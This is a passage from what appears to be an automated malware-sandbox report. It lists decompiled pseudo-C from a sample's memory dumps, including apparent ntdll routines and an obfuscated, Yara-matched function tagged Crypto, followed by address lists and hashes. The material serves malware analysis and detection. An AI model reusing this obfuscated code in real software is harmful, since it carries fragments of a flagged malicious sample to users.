																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3498638; // 0x0
																	_t122 = L033B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E033B76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E033B76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L033DFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L033B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E033DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E033DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E033DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E033DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E033DFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3497b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3497b84 = _t75;
						_t73 = E033BEB70(_t134, 0x3497b60);
						if( *0x3497b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E033BFF60( *0x3497b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                          0x033dfab0
                                          0x033dfab2
                                          0x033dfab3
                                          0x033dfab4
                                          0x033dfabc
                                          0x033dfac0
                                          0x033dfb14
                                          0x033dfb17
                                          0x033dfac2
                                          0x033dfac8
                                          0x033dfacd
                                          0x033dfad3
                                          0x033dfad3
                                          0x033dfadd
                                          0x033dfb18
                                          0x033dfb1b
                                          0x033dfb1d
                                          0x033dfb1e
                                          0x033dfb1f
                                          0x033dfb20
                                          0x033dfb21
                                          0x033dfb22
                                          0x033dfb23
                                          0x033dfb24
                                          0x033dfb25
                                          0x033dfb26
                                          0x033dfb27
                                          0x033dfb28
                                          0x033dfb29
                                          0x033dfb2a
                                          0x033dfb2b
                                          0x033dfb2c
                                          0x033dfb2d
                                          0x033dfb2e
                                          0x033dfb2f
                                          0x033dfb3a
                                          0x033dfb3b
                                          0x033dfb3e
                                          0x033dfb41
                                          0x033dfb44
                                          0x033dfb47
                                          0x033dfb4a
                                          0x033dfb4d
                                          0x033dfb53
                                          0x0341bdcb
                                          0x0341bdcb
                                          0x033dfb59
                                          0x033dfb5b
                                          0x033dfb5b
                                          0x033dfb5e
                                          0x0341bdd5
                                          0x0341bdd8
                                          0x00000000
                                          0x0341bdda
                                          0x00000000
                                          0x0341bdda
                                          0x033dfb64
                                          0x033dfb64
                                          0x033dfb64
                                          0x033dfb67
                                          0x033dfb6e
                                          0x033dfb70
                                          0x033dfb72
                                          0x00000000
                                          0x033dfb78
                                          0x033dfb7a
                                          0x033dfb7a
                                          0x033dfb7d
                                          0x033dfb80
                                          0x0341bddf
                                          0x0341bde1
                                          0x00000000
                                          0x0341bde3
                                          0x00000000
                                          0x0341bde3
                                          0x033dfb86
                                          0x033dfb86
                                          0x033dfb86
                                          0x033dfb8b
                                          0x033dfb90
                                          0x033dfb92
                                          0x033dfb94
                                          0x033dfb9a
                                          0x033dfb9b
                                          0x033dfba1
                                          0x0341bde8
                                          0x0341bdeb
                                          0x0341bded
                                          0x0341beb5
                                          0x0341beb5
                                          0x0341bebb
                                          0x0341bebd
                                          0x0341bec3
                                          0x0341bed2
                                          0x0341bedd
                                          0x0341bedd
                                          0x0341beed
                                          0x00000000
                                          0x0341bdf3
                                          0x0341bdfe
                                          0x0341be06
                                          0x0341be0b
                                          0x0341be0d
                                          0x0341be0f
                                          0x0341be14
                                          0x0341be19
                                          0x0341be20
                                          0x0341be25
                                          0x0341be27
                                          0x0341be35
                                          0x0341be39
                                          0x0341be46
                                          0x0341be4f
                                          0x0341be54
                                          0x0341be56
                                          0x0341bef8
                                          0x0341bef8
                                          0x00000000
                                          0x0341be5c
                                          0x0341be5c
                                          0x0341be60
                                          0x00000000
                                          0x0341be66
                                          0x0341be66
                                          0x0341be7f
                                          0x0341be84
                                          0x0341be87
                                          0x0341be89
                                          0x0341be8b
                                          0x0341be99
                                          0x0341be9d
                                          0x0341bea0
                                          0x0341beac
                                          0x0341beaf
                                          0x0341beb1
                                          0x0341beb3
                                          0x0341beb3
                                          0x00000000
                                          0x0341bea2
                                          0x0341bea2
                                          0x00000000
                                          0x0341bea2
                                          0x0341be8d
                                          0x0341be8d
                                          0x0341be92
                                          0x00000000
                                          0x0341be92
                                          0x0341be8b
                                          0x0341be60
                                          0x0341be3b
                                          0x0341be3b
                                          0x0341be3e
                                          0x00000000
                                          0x0341be40
                                          0x0341be40
                                          0x0341be44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0341be44
                                          0x0341be3e
                                          0x0341be29
                                          0x0341be29
                                          0x00000000
                                          0x0341be29
                                          0x0341be27
                                          0x00000000
                                          0x033dfba7
                                          0x033dfba7
                                          0x033dfbab
                                          0x0341bf02
                                          0x033dfbb1
                                          0x033dfbb1
                                          0x033dfbb8
                                          0x033dfbbd
                                          0x033dfbbd
                                          0x033dfbbf
                                          0x033dfbbf
                                          0x033dfbc5
                                          0x033dfbcb
                                          0x033dfbf8
                                          0x033dfbf8
                                          0x033dfbfa
                                          0x00000000
                                          0x033dfc00
                                          0x033dfc00
                                          0x033dfc03
                                          0x00000000
                                          0x033dfc09
                                          0x033dfc09
                                          0x033dfc0f
                                          0x033dfc15
                                          0x033dfc23
                                          0x033dfc23
                                          0x033dfc25
                                          0x033dfc27
                                          0x033dfc75
                                          0x033dfc7c
                                          0x033dfc84
                                          0x00000000
                                          0x033dfc29
                                          0x033dfc29
                                          0x033dfc2d
                                          0x033dfc30
                                          0x0341bf0f
                                          0x00000000
                                          0x033dfc36
                                          0x033dfc38
                                          0x033dfc3b
                                          0x033dfc41
                                          0x0341bf17
                                          0x0341bf19
                                          0x0341bf48
                                          0x0341bf4b
                                          0x00000000
                                          0x0341bf1b
                                          0x0341bf22
                                          0x0341bf24
                                          0x0341bf26
                                          0x00000000
                                          0x0341bf2c
                                          0x0341bf37
                                          0x0341bf39
                                          0x0341bf3b
                                          0x00000000
                                          0x0341bf41
                                          0x0341bf41
                                          0x0341bf41
                                          0x0341bf41
                                          0x0341bf45
                                          0x00000000
                                          0x0341bf45
                                          0x0341bf3b
                                          0x0341bf26
                                          0x00000000
                                          0x033dfc47
                                          0x033dfc47
                                          0x033dfc49
                                          0x033dfcb2
                                          0x033dfcb4
                                          0x033dfcb6
                                          0x033dfcdc
                                          0x033dfcdc
                                          0x00000000
                                          0x033dfcb8
                                          0x033dfcc3
                                          0x033dfcc5
                                          0x033dfcc7
                                          0x00000000
                                          0x033dfcc9
                                          0x033dfcc9
                                          0x033dfccd
                                          0x00000000
                                          0x033dfccd
                                          0x033dfcc7
                                          0x00000000
                                          0x033dfc4b
                                          0x033dfc4b
                                          0x033dfc4e
                                          0x033dfc4e
                                          0x033dfc51
                                          0x033dfc51
                                          0x033dfc54
                                          0x033dfc5a
                                          0x033dfc5c
                                          0x033dfc5f
                                          0x033dfc61
                                          0x033dfc63
                                          0x033dfc65
                                          0x033dfc67
                                          0x033dfc6e
                                          0x033dfc72
                                          0x033dfc72
                                          0x033dfc72
                                          0x033dfc72
                                          0x033dfc67
                                          0x033dfc61
                                          0x00000000
                                          0x033dfc5a
                                          0x033dfc49
                                          0x033dfc41
                                          0x033dfc30
                                          0x033dfc27
                                          0x033dfc03
                                          0x033dfbcd
                                          0x033dfbd3
                                          0x033dfbd9
                                          0x033dfbdc
                                          0x033dfbde
                                          0x033dfc99
                                          0x033dfc9b
                                          0x033dfc9d
                                          0x033dfcd5
                                          0x033dfcd5
                                          0x033dfc89
                                          0x033dfc89
                                          0x00000000
                                          0x033dfc9f
                                          0x033dfc9f
                                          0x033dfca3
                                          0x00000000
                                          0x033dfca3
                                          0x00000000
                                          0x033dfbe4
                                          0x033dfbe4
                                          0x033dfbe4
                                          0x033dfbe4
                                          0x033dfbe9
                                          0x033dfbf2
                                          0x00000000
                                          0x033dfbf2
                                          0x033dfbde
                                          0x033dfbcb
                                          0x033dfbab
                                          0x033dfc8b
                                          0x033dfc8b
                                          0x033dfc8c
                                          0x033dfb80
                                          0x033dfb72
                                          0x033dfb5e
                                          0x033dfc8d
                                          0x033dfc91
                                          0x033dfadf
                                          0x033dfadf
                                          0x033dfae1
                                          0x033dfae4
                                          0x033dfae7
                                          0x033dfaec
                                          0x033dfaf8
                                          0x033dfb00
                                          0x033dfb07
                                          0x033dfb0f
                                          0x033dfb0f
                                          0x033dfb07
                                          0x00000000
                                          0x033dfaf8
                                          0x033dfadd

                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0341BE0F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          • Opcode ID: da81ae6305b5256d5afdc728973cbb41316ec6e21df30ee1628fde78e86523b8
                                          • Instruction ID: e9a6eae33173c20d59cd62c6c06d71abce116c0065f8bc2daca3b795369b6c90
                                          • Opcode Fuzzy Hash: da81ae6305b5256d5afdc728973cbb41316ec6e21df30ee1628fde78e86523b8
                                          • Instruction Fuzzy Hash: 2FA1F276B00B058BDB25DB68D8D07AAB7A9EF48714F08456AE907DFB80DB30D9118B84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E94D, Relevance: 1.5, Strings: 1, Instructions: 213COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E0041E94D(signed int __eax, signed int __ebx, signed int __edx, void* __esi) {
				signed int _t26;
				signed int _t28;
				signed int _t31;
				signed int _t32;
				signed int _t39;
				signed int _t42;
				void* _t43;
				signed int _t46;
				signed int _t47;
				void* _t49;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				signed int _t64;

				_t31 = __ebx;
				_t42 =  *0xe69500eb;
				_t39 = __edx & 0x62c09d3f;
				_t26 = __eax &  *0xe11f57d4;
				_t54 = _t26;
				if(_t54 >= 0) {
					 *0xd80eba72 =  *0xd80eba72 - __eax;
					asm("rcr byte [0x6f97c4e2], 0x48");
					__edx =  *0xff45976b * 0x59e0;
					_push( *0x743594fe);
					__ecx =  *0xbcdf57bb;
					_pop(__esp);
					asm("rcl dword [0x8556d18b], 0x0");
					 *0x6b982b9a =  *0x6b982b9a << 0x67;
					asm("adc [0x1abaedfe], eax");
					__ebp =  *0xbea22b69 * 0xdacf;
					 *0x6f09b08a =  *0x6f09b08a << 0xa3;
					asm("sbb edx, 0x1b1fc929");
					 *0x8286100c =  *0x8286100c | __dl;
					 *0xb8dd9f05 =  *0xb8dd9f05 ^ __edi;
					_push( *0xc684e307);
					__edi =  *0xc82ede96;
					__eflags = __esi - 0x2482d8f3;
					asm("scasb");
					asm("ror dword [0xcce0dcbc], 0x29");
					_t10 = __esp;
					__esp =  *0x95956713;
					 *0x95956713 = _t10;
					_push( *0xf806bbcb);
					__esi = __esi +  *0x256f170f;
					__bh = __bh + 0xd2;
					_push(0xa72a0fdb);
					 *0xa0d42b80 =  *0xa0d42b80 >> 0xd6;
					__eflags =  *0xa0d42b80;
					if( *0xa0d42b80 >= 0) {
						goto L1;
					}
					_pop( *0x6d437671);
					__esp = 0x38f071de;
					_push(__ebx);
					 *0x7f2bd3bf =  *0x7f2bd3bf << 0x98;
					__eflags =  *0x7f2bd3bf;
					if( *0x7f2bd3bf < 0) {
						goto L1;
					}
					asm("rcl dword [0xaa29ba70], 0x9b");
					__edx = __edx -  *0xcaaa938e;
					__eflags = __eax - 0x1835a50e;
					asm("ror dword [0x2dac16cf], 0xa9");
					 *0xb6ac5b01 =  *0xb6ac5b01 + 0x38f071de;
					__eflags =  *0xbd4cb421 - __eax;
					__al = __al ^ 0x000000a2;
					 *0x912742e1 =  *0x912742e1 + __bl;
					__eflags =  *0x912742e1;
					if( *0x912742e1 >= 0) {
						goto L1;
					}
					__eflags =  *0x6a33bc79 & __edx;
					if(( *0x6a33bc79 & __edx) >= 0) {
						goto L1;
					}
					__esp =  *0xfdfb177d * 0xc0bd;
					asm("movsw");
					__eflags =  *0xe2550bc2 & __edx;
					asm("sbb [0x8dca09d7], dl");
					asm("cmpsb");
					__eflags = __edx & 0xbe4a61c5;
					__ch = __ch ^  *0xa560e488;
					_pop(__eax);
					 *0xe8cc8f16 =  *0xe8cc8f16 << 0xe3;
					 *0x970af3e2 =  *0x970af3e2 >> 0xee;
					 *0x504e109f =  *0x504e109f ^ __esi;
					 *0x93adaac4 = __edx;
					asm("ror dword [0x79ff14c8], 0xdd");
					__ebx = __ebx | 0x7903ae9b;
					__eflags = __al - 0xb6;
					__esp =  *0xfdfb177d * 0xc0bd +  *0xd0a16468;
					 *0xd4480af3 =  *0xd4480af3 + __esi;
					__eflags =  *0xd4480af3;
					 *0x747b519f = __esp;
					 *0x5ee11cc6 =  *0x5ee11cc6 >> 0xb7;
					__eax =  *0x2b961725;
					if( *0xd4480af3 < 0) {
						goto L1;
					}
					__esi =  *0xa4d9ad7c * 0xde25;
					__bh = __bh & 0x000000ca;
					__eflags = __bh;
					_t17 = __esp;
					__esp =  *0xdf9cc6ec;
					 *0xdf9cc6ec = _t17;
					asm("stosd");
					if(__bh <= 0) {
						goto L1;
					}
					__ebp =  *0xb566c17e * 0x8e08;
					asm("ror dword [0xaf5c9b15], 0x1b");
					asm("sbb [0x593c34e4], bh");
					asm("adc cl, 0x63");
					 *0xba527e63 =  *0xba527e63 << 0xcf;
					__edi = __edi + 0x841e58c4;
					_push( *0xc6ca1381);
					__ch = __ch +  *0x37af8a18;
					_t18 = __esp;
					__esp =  *0xbae5e135;
					 *0xbae5e135 = _t18;
					_t19 = __esi;
					__esi =  *0xa605a636;
					 *0xa605a636 = _t19;
					_push( *0x72c76681);
					_pop(__eax);
					__ecx = __ecx &  *0xca4f998d;
					_push(__edx);
					__ebp = 1 +  *0xb566c17e * 0x8e08;
					__eflags = __ebp;
					_push(0x632ec1bc);
					asm("rcr dword [0xabceb66e], 0xc9");
					if(__ebp >= 0) {
						goto L1;
					}
					 *0x7c06b279 = __esi;
					__bl = 0xe1;
					__eflags =  *0xebbff9de & __ecx;
					 *0xede96f34 =  *0xede96f34 | 0x000000e1;
					__ebx = __ebx -  *0xb830a97;
					__eflags = __edx - 0x2342e161;
					__dl = __dl +  *0x6a042a1c;
					__eflags =  *0xd65a3413 & __esi;
					asm("sbb [0x7f04241d], edx");
					 *0x5d4a2ae7 =  *0x5d4a2ae7 + __dh;
					__eflags = __dh - 0xe0;
					__dl = __dl & 0x00000022;
					__edi = __edi -  *0xbdb0d12f;
					__eflags = __edi;
					_pop(__edx);
					if(__edi > 0) {
						goto L1;
					}
					__ecx = __ecx | 0x3c1a7f77;
					 *0xca99dbc9 =  *0xca99dbc9 ^ __bh;
					__bl =  *0x8d1116e6;
					asm("rcr dword [0xf1036c36], 0x9f");
					__ebx = __ebx + 1;
					_t24 = __dh;
					__dh =  *0x22f3230a;
					 *0x22f3230a = _t24;
					asm("cmpsw");
					asm("adc bl, 0x32");
					__esp = __esp ^  *0x16d2ea3e;
					__eflags = __esp;
					_push(__ebp);
					if(__eflags != 0) {
						goto L1;
					}
					asm("adc [0x273e37a], edi");
					__eflags = __edi;
					return __eax;
				}
				L1:
				if(_t54 == 0) {
					 *0x7b56427b =  *0x7b56427b | _t39;
					_t26 = _t26 ^ 0x3b47750b;
					asm("rcl byte [0x784c08b3], 0xa2");
					asm("rol dword [0x583ee13], 0x80");
					_t33 = 0xe4;
					 *0xf579e533 =  *0xf579e533 & _t51;
					if( *0xf579e533 >= 0) {
						asm("ror dword [0xd2a7e670], 0x60");
						_push(_t51);
						_t3 = _t26;
						_t26 =  *0xcd3337b4;
						 *0xcd3337b4 = _t3;
						_t4 = _t51;
						_t51 =  *0xf3a5d2fd;
						 *0xf3a5d2fd = _t4;
						 *0xe321ed2 =  *0xe321ed2 << 0xe1;
						 *0x5a161c05 =  *0x5a161c05 | _t52;
						_t32 = _t31;
						_t31 = _t32 &  *0x5e27d1c0;
						_push(0xdf14bd6d);
						_t42 = _t42 -  *0x2c7fd49b;
						if(_t42 >= 0) {
							asm("adc [0xf4038e70], esi");
							 *0x8c1569f2 =  *0x8c1569f2 & _t39;
							asm("ror byte [0x31b82be5], 0x1a");
							 *0xa3c79897 =  *0xa3c79897 << 8;
							_push(_t31);
							if( *0xa3c79897 > 0) {
								_t31 =  *0x8c109e7e * 0xe778;
								asm("movsw");
								if(_t31 > 0) {
									 *0x573216f4 =  *0x573216f4 << 0xff;
									_t39 = _t39 + 0x6dcbb876 ^ 0x000000b3;
									 *0x8f89223e =  *0x8f89223e & _t31;
									_push(_t42);
									_t46 =  *0xc1b735eb;
									 *0x894dd7b0 = _t31;
									 *0x73fc2d22 =  *0x73fc2d22 >> 0x51;
									if( *0x73fc2d22 >= 0) {
										_t39 =  *0xb6bfa87c * 0x4a1;
										_t31 = _t31 +  *0xf4da98b9;
										_t47 = _t46 | 0xad2b912f;
										asm("ror byte [0x4beab08], 0xe1");
										_push(_t51);
										_t42 = _t42 &  *0x96b7dcc0;
										_t26 = _t26 - 0xeabad93b;
										_t64 = _t26;
										if(_t64 >= 0) {
											_pop( *0xbaa0b370);
											if(_t64 < 0) {
												 *0x9bb96673 =  *0x9bb96673 << 0x44;
												 *0x5792c666 = _t47;
												 *0x3851bdcd =  *0x3851bdcd << 0x15;
												 *0xf60f2d04 =  *0xf60f2d04 + _t31;
												_t28 = _t31;
												_t49 = (_t47 & 0xafe2960d) - 0x59f87bc0;
												 *0x2d8de185 =  *0x2d8de185 >> 0x89;
												asm("sbb ebp, [0x407211a9]");
												_t26 = (_t28 | 0x56bc1b16) - 0x00000001 | 0x0000002c;
												_t31 = _t31 &  *0xc04b2781;
												_t39 = _t39 - 0x267ff797 ^  *0xa2c723d3;
												_t33 = 0 -  *0x5c1b300e ^  *0x25aaf492;
												_t43 = _t31;
												_t42 = _t43 -  *0x1664f433;
												_t9 = _t52;
												_t52 =  *0x9a812f3b;
												 *0x9a812f3b = _t9;
												if(_t42 < 0) {
													_t52 =  *0xd9acbf73;
													_t50 = _t49 -  *0x154fee1f;
													if(_t26 >= 0xb1) {
														_t54 = _t50 -  *0xc0b9c078;
														_t33 = _t33 + 0x2922671b;
														_t26 = _t26 ^ 0x0dd47c66;
														asm("rol dword [0xbc11fe13], 0x4a");
														_pop(_t52);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}


















                                          0x0041e94d
                                          0x0041e953
                                          0x0041e959
                                          0x0041e965
                                          0x0041e965
                                          0x0041e96b
                                          0x0041e971
                                          0x0041e977
                                          0x0041e97e
                                          0x0041e988
                                          0x0041e98e
                                          0x0041e994
                                          0x0041e995
                                          0x0041e99c
                                          0x0041e9a3
                                          0x0041e9a9
                                          0x0041e9b3
                                          0x0041e9ba
                                          0x0041e9c0
                                          0x0041e9c6
                                          0x0041e9cc
                                          0x0041e9d2
                                          0x0041e9d8
                                          0x0041e9de
                                          0x0041e9df
                                          0x0041e9e6
                                          0x0041e9e6
                                          0x0041e9e6
                                          0x0041e9ec
                                          0x0041e9f2
                                          0x0041e9f8
                                          0x0041e9fb
                                          0x0041ea00
                                          0x0041ea00
                                          0x0041ea07
                                          0x00000000
                                          0x00000000
                                          0x0041ea0d
                                          0x0041ea13
                                          0x0041ea19
                                          0x0041ea1a
                                          0x0041ea1a
                                          0x0041ea21
                                          0x00000000
                                          0x00000000
                                          0x0041ea27
                                          0x0041ea2e
                                          0x0041ea34
                                          0x0041ea39
                                          0x0041ea40
                                          0x0041ea46
                                          0x0041ea4c
                                          0x0041ea4e
                                          0x0041ea4e
                                          0x0041ea54
                                          0x00000000
                                          0x00000000
                                          0x0041ea5a
                                          0x0041ea60
                                          0x00000000
                                          0x00000000
                                          0x0041ea66
                                          0x0041ea70
                                          0x0041ea72
                                          0x0041ea78
                                          0x0041ea7e
                                          0x0041ea7f
                                          0x0041ea85
                                          0x0041ea8b
                                          0x0041ea8c
                                          0x0041ea93
                                          0x0041ea9a
                                          0x0041eaa0
                                          0x0041eaa6
                                          0x0041eaad
                                          0x0041eab3
                                          0x0041eab5
                                          0x0041eabb
                                          0x0041eabb
                                          0x0041eac1
                                          0x0041eac7
                                          0x0041eace
                                          0x0041ead3
                                          0x00000000
                                          0x00000000
                                          0x0041ead9
                                          0x0041eae3
                                          0x0041eae3
                                          0x0041eae6
                                          0x0041eae6
                                          0x0041eae6
                                          0x0041eaec
                                          0x0041eaed
                                          0x00000000
                                          0x00000000
                                          0x0041eaf3
                                          0x0041eafd
                                          0x0041eb04
                                          0x0041eb0a
                                          0x0041eb0d
                                          0x0041eb14
                                          0x0041eb1a
                                          0x0041eb20
                                          0x0041eb26
                                          0x0041eb26
                                          0x0041eb26
                                          0x0041eb2c
                                          0x0041eb2c
                                          0x0041eb2c
                                          0x0041eb32
                                          0x0041eb38
                                          0x0041eb39
                                          0x0041eb3f
                                          0x0041eb40
                                          0x0041eb40
                                          0x0041eb41
                                          0x0041eb46
                                          0x0041eb4d
                                          0x00000000
                                          0x00000000
                                          0x0041eb53
                                          0x0041eb59
                                          0x0041eb5b
                                          0x0041eb61
                                          0x0041eb67
                                          0x0041eb6d
                                          0x0041eb73
                                          0x0041eb79
                                          0x0041eb7f
                                          0x0041eb85
                                          0x0041eb8b
                                          0x0041eb8e
                                          0x0041eb91
                                          0x0041eb91
                                          0x0041eb97
                                          0x0041eb98
                                          0x00000000
                                          0x00000000
                                          0x0041eb9e
                                          0x0041eba4
                                          0x0041ebaa
                                          0x0041ebb0
                                          0x0041ebb7
                                          0x0041ebb8
                                          0x0041ebb8
                                          0x0041ebb8
                                          0x0041ebbe
                                          0x0041ebc0
                                          0x0041ebc3
                                          0x0041ebc3
                                          0x0041ebc9
                                          0x0041ebca
                                          0x00000000
                                          0x00000000
                                          0x0041ebd0
                                          0x0041ebd6
                                          0x0041ebdc
                                          0x0041ebdc
                                          0x0041e632
                                          0x0041e632
                                          0x0041e634
                                          0x0041e63a
                                          0x0041e63f
                                          0x0041e646
                                          0x0041e656
                                          0x0041e657
                                          0x0041e65d
                                          0x0041e65f
                                          0x0041e666
                                          0x0041e667
                                          0x0041e667
                                          0x0041e667
                                          0x0041e66d
                                          0x0041e66d
                                          0x0041e66d
                                          0x0041e673
                                          0x0041e67b
                                          0x0041e681
                                          0x0041e688
                                          0x0041e68e
                                          0x0041e693
                                          0x0041e699
                                          0x0041e69b
                                          0x0041e6a1
                                          0x0041e6a7
                                          0x0041e6ae
                                          0x0041e6b5
                                          0x0041e6b6
                                          0x0041e6bc
                                          0x0041e6c6
                                          0x0041e6c8
                                          0x0041e6d4
                                          0x0041e6db
                                          0x0041e6de
                                          0x0041e6e4
                                          0x0041e6e5
                                          0x0041e6eb
                                          0x0041e6f1
                                          0x0041e6f8
                                          0x0041e6fe
                                          0x0041e708
                                          0x0041e70e
                                          0x0041e714
                                          0x0041e721
                                          0x0041e722
                                          0x0041e728
                                          0x0041e728
                                          0x0041e72d
                                          0x0041e733
                                          0x0041e739
                                          0x0041e73f
                                          0x0041e749
                                          0x0041e76d
                                          0x0041e775
                                          0x0041e77b
                                          0x0041e782
                                          0x0041e788
                                          0x0041e794
                                          0x0041e79c
                                          0x0041e79f
                                          0x0041e7a5
                                          0x0041e7ab
                                          0x0041e7b1
                                          0x0041e7b8
                                          0x0041e7be
                                          0x0041e7be
                                          0x0041e7be
                                          0x0041e7c4
                                          0x0041e7ca
                                          0x0041e7d0
                                          0x0041e7d8
                                          0x0041e7de
                                          0x0041e7e5
                                          0x0041e7eb
                                          0x0041e7f0
                                          0x0041e7f7
                                          0x0041e7f7
                                          0x0041e7d8
                                          0x0041e7c4
                                          0x0041e739
                                          0x0041e72d
                                          0x0041e6f8
                                          0x0041e6c8
                                          0x0041e6b6
                                          0x0041e699
                                          0x0041e65d
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: aB#
                                          • API String ID: 0-810631720
                                          • Opcode ID: 9255c7ab87ebda63e51ffa24c2482c54c43a7850cd3baa1b9d922962688ef9cf
                                          • Instruction ID: 8d58b525a9bdcbe4c5772277d6d0bdeb9587307e4d7a8cee28f0feea5ede6e6a
                                          • Opcode Fuzzy Hash: 9255c7ab87ebda63e51ffa24c2482c54c43a7850cd3baa1b9d922962688ef9cf
                                          • Instruction Fuzzy Hash: A2A16376958780DFD715CF39CAAAA823FB6F352720B84424FC8A1975D1C37524A2CF89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E033A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
